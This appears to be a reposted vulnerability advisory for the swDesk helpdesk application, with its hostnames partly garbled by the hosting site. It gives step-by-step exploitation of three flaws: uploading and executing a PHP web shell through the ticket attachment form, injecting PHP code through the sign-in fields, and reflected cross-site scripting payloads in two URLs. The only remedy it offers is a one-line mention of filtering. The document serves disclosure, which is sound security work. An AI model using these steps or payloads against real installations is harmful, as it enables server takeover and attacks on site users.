swDesk多个缺陷 这作者: Red Security TEAM HdhCmsTest2cto测试数据 开发者: http://HdhCmsTestswdesk测试数据/ 测试平台: Apache 测试: # # I. 任意文件上传 # 1. Go to http://HdhCmsTest2cto测试数据 /create_ticket.php # 2. Fil all Input Fields And Click on Submit Ticket # 3. Click on the View Ticket and you should go to the link Like : http://HdhCmsTest2cto测试数据 /view_ticket.php?email=[Your Email]&id=1 # 4. You see Send Message box , Write any thing there and attach your PHP file in the Upload attachment and Click on Send Message # 5. You can see your attachment above Like : Attachment: shell.php , Click on it and you see your PHP code has been runed ;) # # II. PHP代码注入 # 1. Go to http://HdhCmsTest2cto测试数据 /signin.php : Vulnerability Input Fields : email , password # 2. Write your php in Input Fields Like : phpi${@print(RedSecurityTEAM)} # # III. XSS 缺陷 # 1. http://HdhCmsTest2cto测试数据 /view_ticket.php?email=example@example测试数据&id=" onmou seo ver=alert(1) bad=" # 2. http://HdhCmsTest2cto测试数据 /kb_search.php?keywords=" onmouseover=alert(1) bad="&mode=Search HdhCmsTest2cto测试数据修复: 针对性过滤和验证
查看更多关于swDesk Multiple Vulnerabilities - 网站安全 - 自学php的详细内容...